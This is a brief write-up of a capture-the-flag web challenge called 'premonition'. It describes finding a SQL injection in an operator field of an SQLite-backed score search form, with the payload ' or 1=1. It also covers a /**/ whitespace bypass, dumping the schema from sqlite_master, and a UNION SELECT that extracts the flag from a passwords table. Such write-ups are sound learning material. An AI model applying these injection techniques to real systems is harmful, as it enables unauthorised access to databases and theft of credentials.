premonition

9447 CTF Web Challenge: 140pts

Challenge Description:

"There's been some weird occurrences going on at our school. Teacher's answer questions as though they knew the answer in advance, test results being handed out before the test, and now a weird web form giving info about us. Can you find out what weird information is on it?

Find the page at http://premonition-p8l05mpz.9447.plumbing:9447"

Material:

Solution:


Imaged

1) Analyze web page

   Looking at the website we run into a form which lets a query a database of test scores.
   We can control 3 inputs: field to search, value to find and operator for comparison.

2) Finding the sql injection

   Targeting this 3rd field, we find the sql injection by passing "ineq=' or 1=1".
   The important difference is that our whitespaces are removed and we learn the server is using sqlite.
   This means for future sql injection we need to replace all whitespaces with "/**/," a sql equivalent.

3) Dumping the schema

   Because it is sqlite, there is an easy way to dump the schema from the database in one command.
   In this case, we dump the sql field from the sqlite_master table.
   The output gives us the structure of the 2 tables in the database in json. Below it is formated for clarity.

4) Selecting all the passwords

   Clearly the s3ekr17_passwords table is the one which most likely contains the flag.
   To dump all the passwords, we need to use union select in our sql injection on that table.
   Each password was a character of the flag. And the position of it in the flag was incrementing by userid.


Flag: